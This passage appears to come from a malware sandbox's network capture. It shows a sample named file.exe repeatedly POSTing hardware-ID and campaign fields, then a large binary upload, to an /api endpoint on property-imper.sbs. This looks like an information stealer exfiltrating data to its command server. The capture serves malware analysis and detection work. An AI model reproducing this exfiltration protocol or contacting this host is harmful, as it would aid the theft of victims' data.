                                                                                    Set-Cookie: PHPSESSID=8jnel89mhvnv4189jv64fci08d; expires=Wed, 19-Mar-2025 14:46:04 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QtSUY6rUBur87o6fh%2Fh4q%2B0kjK0jnIaN56l2y5u6K1wo%2FQMC97NLHSPp1ExxWLb01s8RmwVvbTjZQ9oZBzOmALgwzDwcP1HkrlitZUrP97bXlKrJDhCjJqq5sY4xTvSHKKrtQHs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e74153c0b7243aa-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=21363&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13764&delivery_rate=109175&cwnd=239&unsent_bytes=0&cid=677150a60bee9a33&ts=948&x=0"
                                                                                    2024-11-23 20:59:26 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 20:59:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.749720104.21.33.1164437400C:\Users\user\Desktop\file.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 20:59:27 UTC277OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=ELAGYYVKSDF
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 15040
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 20:59:27 UTC15040OUTData Raw: 2d 2d 45 4c 41 47 59 59 56 4b 53 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 32 43 32 35 35 33 38 38 33 44 39 41 32 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 45 4c 41 47 59 59 56 4b 53 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 4c 41 47 59 59 56 4b 53 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 4c 41 47 59 59 56 4b 53 44 46
                                                                                    Data Ascii: --ELAGYYVKSDFContent-Disposition: form-data; name="hwid"E32C2553883D9A2BD7CBBD6DF28D3732--ELAGYYVKSDFContent-Disposition: form-data; name="pid"2--ELAGYYVKSDFContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--ELAGYYVKSDF
                                                                                    2024-11-23 20:59:32 UTC1018INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 20:59:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=jp0jd5ufuloq2ekroaha0bb4nd; expires=Wed, 19-Mar-2025 14:46:07 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KA9ASkfS11PpPZ4PJqr0HVPXLjuZUEz3KLwwXv%2FImZCfUMpUeCj45T2T9PIehMNw7MLRGiOiXnZml53iuRn9XGvdoaJlOb3EfD8T7e6XCD549cJoucc3fLyA6Vg7lQX%2Bj3%2Fh2to%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e74154adb1d42d4-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15975&delivery_rate=1812538&cwnd=245&unsent_bytes=0&cid=e9d5ea39ff5acafe&ts=4555&x=0"
                                                                                    2024-11-23 20:59:32 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 20:59:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.749736104.21.33.1164437400C:\Users\user\Desktop\file.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 20:59:33 UTC281OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=8OW6FYRB5LGCQFP
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 20389
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 20:59:33 UTC15331OUTData Raw: 2d 2d 38 4f 57 36 46 59 52 42 35 4c 47 43 51 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 32 43 32 35 35 33 38 38 33 44 39 41 32 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 38 4f 57 36 46 59 52 42 35 4c 47 43 51 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 4f 57 36 46 59 52 42 35 4c 47 43 51 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                    Data Ascii: --8OW6FYRB5LGCQFPContent-Disposition: form-data; name="hwid"E32C2553883D9A2BD7CBBD6DF28D3732--8OW6FYRB5LGCQFPContent-Disposition: form-data; name="pid"3--8OW6FYRB5LGCQFPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                    2024-11-23 20:59:33 UTC5058OUTData Raw: 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0
                                                                                    Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                    2024-11-23 20:59:35 UTC1020INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 20:59:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=88osoilc1i33ful3696dpl7pkg; expires=Wed, 19-Mar-2025 14:46:13 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=by9ZvYqCBKgU9y7vv03yVs%2Fx7nbhTPpr6bR%2FCRjFs003NKlsb4ZudfWUM3rUPFuJqMWYFh6TfMjEOoVzDlBvgK%2BgOp5IAaviaAbQ5uwg6EWeWSQTHto%2FDTTyo69qufGtqEdIxSc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e7415706c7e8ca5-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=4848&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21350&delivery_rate=1618625&cwnd=242&unsent_bytes=0&cid=0fe7af1fb2568c8b&ts=1797&x=0"
                                                                                    2024-11-23 20:59:35 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 20:59:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.749744104.21.33.1164437400C:\Users\user\Desktop\file.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 20:59:37 UTC279OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=5E9ZSLO7I9BJUY
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 1201
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 20:59:37 UTC1201OUTData Raw: 2d 2d 35 45 39 5a 53 4c 4f 37 49 39 42 4a 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 32 43 32 35 35 33 38 38 33 44 39 41 32 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 35 45 39 5a 53 4c 4f 37 49 39 42 4a 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 45 39 5a 53 4c 4f 37 49 39 42 4a 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 45
                                                                                    Data Ascii: --5E9ZSLO7I9BJUYContent-Disposition: form-data; name="hwid"E32C2553883D9A2BD7CBBD6DF28D3732--5E9ZSLO7I9BJUYContent-Disposition: form-data; name="pid"1--5E9ZSLO7I9BJUYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5E
                                                                                    2024-11-23 20:59:38 UTC1020INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 20:59:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=qsf24rldft2bkh99laoovhbk77; expires=Wed, 19-Mar-2025 14:46:16 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vL5eKMpqs1Xk3wNyG10wxnvVlNe5nPXjt0YtKESC%2Bcg8rOj0GwCOpqOs%2FlHdhDTuWoO1hZ6CCP1QB2xz4BK%2BSHLa1P0uN%2Bf%2BSN6vjlPU9mLME%2F9daHDLu74w4cA42dp6kDMTE2k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e74158878cac47a-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=7458&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2116&delivery_rate=1203131&cwnd=241&unsent_bytes=0&cid=03779b33fb2841e1&ts=753&x=0"
                                                                                    2024-11-23 20:59:38 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 20:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.749756104.21.33.1164437400C:\Users\user\Desktop\file.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 20:59:40 UTC279OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=KFOSZXIUWIOX
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 550170
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: 2d 2d 4b 46 4f 53 5a 58 49 55 57 49 4f 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 32 43 32 35 35 33 38 38 33 44 39 41 32 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4b 46 4f 53 5a 58 49 55 57 49 4f 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 46 4f 53 5a 58 49 55 57 49 4f 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 46 4f 53 5a 58 49 55
                                                                                    Data Ascii: --KFOSZXIUWIOXContent-Disposition: form-data; name="hwid"E32C2553883D9A2BD7CBBD6DF28D3732--KFOSZXIUWIOXContent-Disposition: form-data; name="pid"1--KFOSZXIUWIOXContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--KFOSZXIU
                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: 81 1e a7 0e a6 c1 ab e3 f1 44 53 2b 78 bf f0 34 2b f5 24 20 88 d3 f4 b9 77 5a a7 a1 89 5b 73 09 05 40 9e 0f 94 39 cc 41 cb 61 a5 e7 0e 60 5e a5 9b 3a 00 9c 38 4d b3 24 2e 2f f6 87 1c c6 1b dc aa d1 9e 84 c8 0c a9 2f 7a e6 a8 d0 e5 eb dd b7 b4 45 3b 42 89 11 e1 52 50 71 2c 05 a5 db 8c 1b 77 30 6f cb 20 e7 c9 81 eb 2b 66 d2 e1 07 34 f9 1a ae 05 f0 b0 c8 31 43 77 85 06 43 cb bb 51 55 e6 03 66 e9 15 96 f8 e6 31 19 43 e9 d5 7f d1 c4 d4 10 bd cd b2 fd 7b 25 ff 2e db 42 fe b6 b1 a9 ae 8b d4 48 f7 18 9e 1d b8 bb ca 69 28 4a e5 eb 2c e2 d2 c8 f5 ad c8 65 87 0d e5 01 a1 f9 e3 6e 33 07 c0 25 a3 b4 88 b0 a4 49 f1 e7 02 99 8b f1 ca 7a 72 1a 9c 26 0d aa ee ec 91 0e e3 c3 0e 5c 97 82 86 01 a6 d8 b8 bb 12 39 ff 5f 59 8c 5f 7c 7d d8 ce 51 37 95 16 8d 83 ce 06 2f 5a 50 1f
                                                                                    Data Ascii: DS+x4+$ wZ[s@9Aa`^:8M$.//zE;BRPq,w0o +f41CwCQUf1C{%.BHi(J,en3%Izr&\9_Y_|}Q7/ZP
                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: 56 24 e7 5d 66 9a 61 07 76 ac 6e 6a 3c c6 86 54 7a 92 6d 4b b9 ef 1c 9e 5d 3c 00 02 8a 73 fc aa 57 2d 83 ac b7 eb d5 35 6e 77 ed 41 f4 05 0f 57 14 3c f9 5c 1f 76 15 f5 f2 91 0d df af 95 be 16 3e fe 59 af d7 64 d9 c8 bd a7 b2 5d 19 e3 3d 7b 7c 8f 98 27 87 48 09 bc 56 92 50 7a c8 e3 d4 9f db 42 e8 98 ec 34 30 5f 62 20 6a 19 bd 76 f2 d5 d7 6a 9d 65 93 e4 50 35 b3 34 97 1d 7b 8f 44 eb 91 2c 43 38 fa 64 32 36 0d 6f 1c a9 30 af 56 fe d0 3d 0a 08 39 95 a7 a6 09 b1 4a 85 7e 56 7b 6c 47 68 32 d1 93 f7 34 42 a9 4f e0 1e 3b 21 e9 d5 9f 9f 5f d6 f2 72 cc 65 be 7b ab 3e 83 c5 ef d9 af 02 a1 17 82 49 e2 39 0d 72 c5 5a 32 f9 5d fe 6d ec d0 3c 71 a3 01 05 25 0c 15 89 d9 81 21 1a 0b cd 4f 09 ee fe 98 ae 40 3c 6f 2d 76 df f1 b8 ea 24 df b5 49 da 8b fd af ae cf a7 7a 62 fb
                                                                                    Data Ascii: V$]favnj<TzmK]<sW-5nwAW<\v>Yd]={|'HVPzB40_b jvjeP54{D,C8d26o0V=9J~V{lGh24BO;!_re{>I9rZ2]m<q%!O@<o-v$Izb
                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: 6b 69 42 6f 24 c6 50 fb 49 db 19 79 d9 65 99 5f 12 cc c3 bf f0 05 fe a8 e2 5e 41 fb fc 5d c9 1e 8f 44 21 56 5a cb cf 90 1f 1a 9f df 38 85 7c 43 7f d9 73 91 07 de 5f 04 ba d0 b0 37 eb 6b 0a 1c 5d 2e 00 31 ff c9 38 0c b4 c7 4a ea d1 0d ca e0 85 a8 95 6b d5 e9 71 c5 79 2d 40 7b 1f 54 60 cc f8 80 12 36 0d 9b c4 5c 1a 4d 02 89 1a a8 90 04 5b b9 8e c0 d1 ac eb 4d a7 4f 54 bf 1f 5f 38 ee 2c d0 a5 3d 5c 7a ab bb 9a 34 f7 5b 86 ae 78 59 b9 ea 56 de 32 d7 45 d0 28 2c 01 0b bb 0a 9a 18 35 b0 bd 09 df 00 a9 33 63 c0 64 0c fb 47 4e 5f ab 9d f2 ac a0 94 ff f3 6d d7 df 8c cf 4a 9c 7b 8f a9 72 df c5 e2 94 c7 79 de 4c b7 1a 53 28 c6 da 58 88 eb e9 13 53 8a 9a fe cc 2a 69 71 9b d1 bd 77 cc 45 03 15 7c 4a ca bc 5e d1 0d 88 a0 c6 2e 93 1e e8 84 cb fc f9 58 90 90 98 f0 de a9
                                                                                    Data Ascii: kiBo$PIye_^A]D!VZ8|Cs_7k].18Jkqy-@{T`6\M[MOT_8,=\z4[xYV2E(,53cdGN_mJ{ryLS(XS*iqwE|J^.X
                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: 77 b7 c6 0e c6 43 7d a3 57 ef ec 36 bc ff ca e9 61 50 df 7c 54 c8 9c cf 60 44 45 67 bd 8b d4 9f 45 a9 dd a9 c5 ff f1 b7 da 7b a4 ca a0 ff 4d c8 24 60 be 3b 35 71 2f ce e7 05 dd 3e 22 13 b7 01 97 b8 c4 5f af 4a 9c 16 fa 50 08 a4 79 eb 1e 15 14 6c 0c f9 5b d8 17 fa f2 f4 97 6b b3 8b c0 31 87 f0 38 f6 87 95 48 92 55 97 a7 5f f2 bc 86 8c a7 6b 2d fb f3 b2 65 fc bc e5 dd aa a6 7d b2 fd 61 d3 51 52 da a9 52 e8 8c 7f b5 4a 58 d8 58 ad 74 7c 49 cc cd 84 f8 b9 e0 81 18 ad 12 4d fb 8b f5 4a df 42 12 7a 2d 5b 2e d3 49 46 e9 a6 91 fd 1c 9f 45 72 cd 88 d6 15 97 6a 00 47 45 83 d0 a8 70 87 af 8a bb 79 9a 3c 96 d1 81 bb 7c a1 f6 c2 92 9b e4 8e 9d 04 68 55 b8 f3 7d b7 09 e4 38 62 f0 a9 2c a4 da 48 17 e3 23 a4 1d 9b fe 3d 68 50 5e 70 87 88 c2 8f d3 e6 b6 39 5e 0c 04 98 2e
                                                                                    Data Ascii: wC}W6aP|T`DEgE{M$`;5q/>"_JPyl[k18HU_k-e}aQRRJXXt|IMJBz-[.IFErjGEpy<|hU}8b,H#=hP^p9^.
                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: 5c 71 97 9c df 53 5a 63 af c3 f1 1d 16 87 08 51 72 f8 9d 04 fb 0f 65 a1 d7 33 62 a2 f5 44 36 86 13 b5 52 75 5b 2a bd 5e 5f d1 46 d9 1b c5 cb 16 ff be 56 8c 66 54 ac fc ab 55 3e a6 0b 66 24 51 2d 48 81 bb 0b 12 44 81 0a eb be c1 60 85 f6 db 36 2d 59 49 6e 67 a3 e1 5b bb 41 ee ac 39 c8 30 2e 0f df 51 f3 64 6f c1 c3 a8 15 14 78 ad 0f 6c 25 78 e7 3e 89 97 9c 6c ce 27 cf 77 ac db dd 00 56 46 8e 6a f3 0f b7 87 15 9d 65 76 ad 0f b7 5b 1c 45 e5 02 6f dd 8b f0 32 c8 c0 86 47 85 5e c6 2a 62 42 3a fb b3 a7 8f 27 16 4c e5 56 5a ed ec de 4a 69 35 ec c4 6e 4c ac 5b 6b 65 e8 42 3f 05 62 6d 6f e0 97 7e ad df c0 8b 95 4a c3 87 18 85 54 cb 4c 52 55 fa c0 45 3c 3e 89 d4 35 b4 59 08 88 11 a2 6d b3 2f 77 80 d1 f2 6a 32 3f 90 fe d3 7c 2c d0 5a 55 7b 5a 78 9c af 43 03 09 9b 0b
                                                                                    Data Ascii: \qSZcQre3bD6Ru[*^_FVfTU>f$Q-HD`6-YIng[A90.Qdoxl%x>l'wVFjev[Eo2G^*bB:'LVZJi5nL[keB?bmo~JTLRUE<>5Ym/wj2?|,ZU{ZxC
                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: 8b 4c 34 99 e3 fe a1 18 be ab 9a fd 86 70 db 31 b4 ad a5 b4 58 6f 2f c1 00 31 a8 27 cb 5f d1 8e ab b7 b6 f6 1c c9 c2 79 8a c7 f5 fe 0a 29 56 5a 54 f6 67 f5 8c 0b 7b 82 bf 2b 60 70 a1 75 24 e8 5a b7 05 11 bd ff 92 24 b6 a9 b9 ee dd af ed 34 6f 85 2d 0c fc 02 f4 dc ed 71 29 bd 49 d6 56 d3 f7 e2 14 4e d2 37 52 ea 23 67 ff 63 43 a4 c2 f0 54 05 90 70 92 fa 27 7f fa b5 a7 e7 20 85 a4 e3 3e f6 84 c6 ad cf a7 67 95 38 fd 0d 55 e6 df c1 b6 26 60 ad 87 53 ff 1b ef 7c 67 2f 78 7f c5 6e ef 5f 59 ea fb 98 fd d9 ff c4 3c bb 76 a7 21 e4 cc 93 f8 c8 2f df 8d 56 de 9e cc 4f d6 11 75 0d ed 97 ba 59 7a 3c 61 a1 91 4c 59 34 bd bd be eb c8 9e db a7 0d f3 e2 29 81 d5 1a 59 e4 d7 72 e1 97 f2 08 7b da 6d 93 f2 90 b1 7d 81 c1 c1 48 09 f9 c9 a3 71 1a cd a4 82 dd b2 ee ff 1b 07 d7
                                                                                    Data Ascii: L4p1Xo/1'_y)VZTg{+`pu$Z$4o-q)IVN7R#gcCTp' >g8U&`S|g/xn_Y<v!/VOuYz<aLY4)Yr{m}Hq
                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: 4f 95 65 7b f7 c2 d5 bf 41 e9 bf 99 87 f3 27 2e 65 22 fb a7 4f 65 03 42 07 46 17 56 dd 2c 63 97 71 50 ac 0c d4 ee 83 5e c2 48 db 87 c9 7b e5 a4 72 04 30 f3 21 ed 30 da 25 14 ba 3f 18 61 54 1c 7a 07 16 5e b0 e9 a3 a4 f5 f2 0a 36 0f 49 c9 a6 13 76 83 22 40 3a b3 20 4f b6 37 14 a1 7f 9a 0f bd 25 10 3e 07 da 0c 50 d6 3d 16 41 d4 42 05 92 a7 f2 90 dc 9b c3 1f 60 f8 fb 48 b2 24 4c 54 fa 95 ad 6e 9f a4 9f 93 e9 ba 62 1f 33 19 15 ae e4 3a 77 d4 e2 7a ae 9c 45 6f 2e 6e 80 13 f8 e0 e9 a2 90 6f 44 80 62 b0 1d 26 27 32 4d 2f dd a3 72 cb ec fb 07 43 f3 e8 78 59 f6 60 55 af d9 65 ae ab 7d 87 e8 a9 ff 3d 8d 6c f7 c5 d2 ef a0 f4 56 e8 87 58 d5 35 87 65 c3 d9 51 19 d3 c9 be 80 21 8e 4c 90 b0 11 ca a5 85 a9 a3 8c cd 8e 47 44 a4 a0 7d 05 8c 8c 00 2e 24 8a 57 be 57 88 ba 9b
                                                                                    Data Ascii: Oe{A'.e"OeBFV,cqP^H{r0!0%?aTz^6Iv"@: O7%>P=AB`H$LTnb3:wzEo.noDb&'2M/rCxY`Ue}=lVX5eQ!LGD}.$WW
                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: bf 16 a1 9c f8 b7 62 9c 01 84 16 9d 8c 0f 32 e0 d9 d5 bc 70 b2 b5 3b 66 bf 76 d7 ef 67 b1 18 f5 6d 21 27 20 74 9d ce 52 09 73 20 8d ff 5e d1 68 f6 f1 45 9b 17 55 64 a0 8f 9f 04 08 45 9c 8b af a5 f3 71 1a 1e c6 60 fa 51 35 c1 db 9c 90 04 ce 44 09 31 15 ca de e5 18 d1 7c af 63 59 14 f8 85 0d fa fe b5 08 7e 89 03 0d dc aa 10 d0 9d 05 bd bd c0 0e 4a 43 30 95 50 d9 08 58 cc 9b 77 c6 50 a8 14 0d a7 f4 46 94 21 c8 58 36 80 bf bc ff d7 87 71 14 60 5b 32 1e 30 ef fc 82 d9 25 e7 63 11 03 9d 67 d1 35 a5 fa 30 f3 9f f8 7e d5 03 db ad 75 ad 0d 0c 20 ee cc 34 16 fc fc 66 e5 20 3b 02 fe eb 25 cb 44 32 34 0f b8 d5 18 16 12 21 ca 61 89 99 6b 27 ac 8d 41 fd 98 ee 0b 35 47 c1 2f fa 3e c2 47 46 40 a8 0f 38 30 55 fa 68 20 30 19 ed 70 53 48 bb 09 31 16 95 c4 60 9a 9a 36 e8 9d
                                                                                    Data Ascii: b2p;fvgm!' tRs ^hEUdEq`Q5D1|cY~JC0PXwPF!X6q`[20%cg50~u 4f ;%D24!ak'A5G/>GF@80Uh 0pSH1`6
